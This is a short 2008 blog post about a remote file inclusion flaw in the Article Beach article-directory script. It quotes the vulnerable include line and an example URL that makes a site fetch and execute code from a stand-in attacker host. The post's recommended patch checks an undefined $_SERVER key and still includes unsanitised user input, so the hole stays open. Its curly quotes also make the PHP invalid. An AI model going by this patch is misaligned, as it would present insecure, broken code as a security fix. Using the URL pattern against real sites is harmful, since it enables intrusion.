Article Beach Security Fix

Oct-12th-2008

By admin in Article Directories, Scripts

Article Beach is a popular script used on Article Directories. Although there isn’t much updates for it and there isn’t many templates or mods for it, it still is a good script to use. One problem with it though is that there is a very silly Security Problem in it. Anyone could easily execute PHP code from your site, they could do anything they wanted. This is probably the major flaw in the script.

Luckily, this short post will tell you how to quickly fix this Security issue.

First, open up your index.php file.

Find this code:

else
{
include($_GET["page"].”.php”);
}

This is the code that is the problem. It grabs the file from a GET variable and executes it. That means anyone could just go to http://www.yourarticledirectory.com/index.php?page=http://www.attackers-website.com/malicious-code.txt and then it would execute the code in the text file.

This is just a small fix for it. Replace that code with the following:

else
{
if (file_exists($_SERVER["root"].”".$_GET["page"].”.php”
) == 1) { include $_GET["page"].”.php”
; }
}

What this code does is it checks if the file exists in the root directory of your article directory first. This should solve the problem because obviously there won’t be a file called http://www.url.com/code.txt in your root directory, so it shouldn’t be able to execute.

Then just save the file, upload it and that major Security flaw should now be solved.

Share and Enjoy:These icons link to social bookmarking sites where readers can share and discover new web pages.